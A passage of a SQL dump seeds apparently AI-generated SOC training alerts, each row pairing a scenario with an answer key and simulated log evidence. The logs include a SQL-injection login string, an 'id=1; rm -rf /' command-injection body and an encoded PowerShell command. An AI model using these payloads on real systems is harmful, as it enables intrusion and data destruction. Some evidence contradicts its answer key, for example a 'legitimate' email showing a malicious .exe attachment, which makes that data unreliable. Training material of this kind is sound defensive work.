/\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(726, 'False Positive: Legitimate Network Activity Misidentified as Brute Force', 'medium', 'Splunk', 'Multiple login attempts were detected from an internal network IP address. The activity was later confirmed to be a legitimate script testing user access.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:50:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.1.30\",\"username\":\"testuser\",\"hostname\":\"AUTH-SERVER\",\"failed_attempts\":15}', '2026-01-10 01:14:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for legitimate script execution\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"User account involved in authorized testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The alert was a false positive as the activity was part of a legitimate internal testing process.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(727, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected attempting to harvest credentials using a malicious URL disguised as an Office365 login page.', 'Phishing', 'T1566', 1, 'investigating', 85, '{\"timestamp\":\"2026-01-11T09:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"support@off1ce365-login.com\",\"url\":\"http://off1ce365-login.com/login\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 05:36:16', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@off1ce365-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain registered 3 days ago and associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://off1ce365-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing page mimicking Office365 login\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL and a suspicious sender domain indicating a phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.373Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(728, 'Brute Force Attack Detected from Known Malicious IP', 'critical', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP, indicating a brute force attack targeting the internal network.', 'Brute Force', 'T1110', 1, 'Closed', 93, '{\"timestamp\":\"2026-01-11T11:32:13Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.10\",\"username\":\"administrator\",\"hostname\":\"server01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":37}', '2026-01-09 18:10:39', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 174 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted in attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network server\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack originated from a known malicious IP with multiple failed login attempts, indicating brute force activity.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:31:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:30:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:29:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:28:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(729, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A malicious executable was detected running on an endpoint, identified by its known malware hash.', 'Malware', 'T1059', 1, 'Closed', 141, '{\"timestamp\":\"2026-01-11T14:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"\",\"username\":\"jane.doe\",\"hostname\":\"workstation01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"C:\\\\malicious_folder\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:28:28', '2026-02-12 04:13:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 63 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious_folder\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable identified as malware with C2 communication\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malicious, and the process execution is anomalous for the user.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(730, 'Suspicious Email Flagged as False Positive', 'medium', 'Email Gateway', 'An email was flagged as suspicious due to a lookalike domain, but the sender is verified as legitimate.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T16:48:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.5\",\"username\":\"john.smith@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"billing@examp1ecorp.com\",\"url\":\"http://examp1ecorp.com/invoice\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-10 08:48:40', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"billing@examp1ecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified sender; domain used by billing department\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://examp1ecorp.com/invoice\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles legitimate company domain but is legitimate\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and domain have been verified as legitimate, marking this as a false positive.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Flagged as False Positive\",\"date\":\"2026-02-01T20:32:22.376Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(731, 'Spear Phishing Attempt with Malicious URL Detected', 'high', 'Proofpoint', 'A spear phishing email was detected attempting to lure a user to a malicious website. The email impersonated the CEO and contained a link to a lookalike domain.', 'Phishing', 'T1566', 1, 'Closed', 142, '{\"timestamp\":\"2026-01-11T09:15:32Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"j.doe@company.com\",\"hostname\":\"workstation-01\",\"email_sender\":\"ceo@company-secure.com\",\"domain\":\"company-secure.com\",\"url\":\"http://secure-company.com/login\"}', '2026-01-11 08:10:28', '2026-03-07 05:12:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns targeting corporate users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-company.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attacks impersonating company executives.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious domain impersonating the CEO, and the URL is flagged as malicious.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.377Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(732, 'Credential Harvesting via Office365 Phishing Page', 'critical', 'Email Gateway', 'An email was detected redirecting the user to an Office365 lookalike login page to steal credentials. The domain used was not authorized by the organization.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:42:18Z\",\"event_type\":\"email_received\",\"src_ip\":\"202.54.1.1\",\"dst_ip\":\"10.0.0.12\",\"username\":\"a.smith@company.com\",\"hostname\":\"workstation-02\",\"email_sender\":\"office365@security-alert.com\",\"domain\":\"security-alert.com\",\"url\":\"http://office-login.com/verify\"}', '2026-01-10 11:41:11', '2026-02-15 08:27:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"office365@security-alert.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address involved in phishing attempts targeting Office365 users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://office-login.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site mimicking Office365 login page.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that leads to a phishing page designed to steal Office365 credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Harvesting via Office365 Phishing Page\",\"date\":\"2026-02-01T20:32:22.378Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(733, 'Business Email Compromise Attempt via Lookalike Domain', 'medium', 'Proofpoint', 'An email pretending to be from a trusted partner was detected with a request for an urgent transaction. The sender\'s domain closely resembles an official domain but is slightly altered.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T13:05:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.8\",\"username\":\"c.brown@company.com\",\"hostname\":\"workstation-03\",\"email_sender\":\"partner@trusted-secure.com\",\"domain\":\"trusted-secure.com\",\"url\":\"http://secure-trusted.com/transaction\"}', '2026-01-09 17:01:50', '2026-03-06 10:30:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"partner@trusted-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembling a trusted partner, associated with BEC attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-trusted.com/transaction\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL used in BEC scams to redirect users to fraudulent transaction pages.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender\'s domain is a lookalike of a trusted partner, used in a BEC attempt to request a fraudulent transaction.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Business Email Compromise Attempt via Lookalike Domain\",\"date\":\"2026-02-01T20:32:22.379Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(734, 'False Positive Alert: Legitimate Email Flagged as Phishing', 'low', 'Email Gateway', 'An email from a new vendor was mistakenly flagged as phishing due to an unusual domain. The email content and sender\'s reputation are verified as legitimate.', 'Phishing', 'T1566', 0, 'Closed', 185, '{\"timestamp\":\"2026-01-11T14:30:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"10.0.0.15\",\"username\":\"m.jones@company.com\",\"hostname\":\"workstation-04\",\"email_sender\":\"info@newvendor.com\",\"domain\":\"newvendor.com\",\"url\":\"http://newvendor.com/welcome\"}', '2026-01-11 06:47:17', '2026-02-20 09:02:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@newvendor.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"Email address verified as legitimate by OSINT checks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://newvendor.com/welcome\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate, associated with a new vendor.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email from a new vendor was mistakenly flagged due to an unfamiliar domain but verified as legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"False Positive Alert: Legitimate Email Flagged as Phishing\",\"date\":\"2026-02-01T20:32:22.380Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
